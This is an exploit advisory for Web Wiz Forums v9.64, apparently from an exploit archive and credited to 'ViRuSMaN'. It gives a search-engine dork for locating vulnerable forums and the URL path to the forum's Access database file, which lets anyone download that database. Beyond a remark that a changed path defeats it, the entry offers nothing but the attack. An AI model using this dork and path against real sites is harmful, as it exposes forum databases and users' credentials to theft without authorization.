id: 10378
date: 12/24/2009
title: Web Wiz Forums v9.64 Database Disclosure Vulnerability
author: ViRuSMaN
cves: 

======================================================
Web Wiz Forums v9.64 Database Disclosure Vulnerability
======================================================

==============================================================================
        [»] ~ Note : Some forums may change the path of the "database/wwForum.mdb" cause the vulnerability not work
==============================================================================
        [»] Web Wiz Forums v9.64 Remote Database Disclosure Vulnerability
==============================================================================
 
    [»] Script:             [ Web Wiz Forums v9.64 ]
    [»] Language:           [ ASP ]
    [»] Site page:          [ Web Wiz Forums - Free Forum Software - Free Bulletin Board Software ]
    [»] Download:           [ http://www.webwizguide.com/webwizforums/webwizforums_downloads.asp ]
    [»] Founder:            [ ViRuSMaN ]
    [»] Dork:               [ Web Wiz Forums® version 9.64 [Free Express Edition] ]
 
###########################################################################
 
===[ Exploit ]===
 
    [»] http://[target].com/[path]/database/wwForum.mdb
 
Author: ViRuSMaN <-
 
###########################################################################



#  0day.today [2023-03-27]  #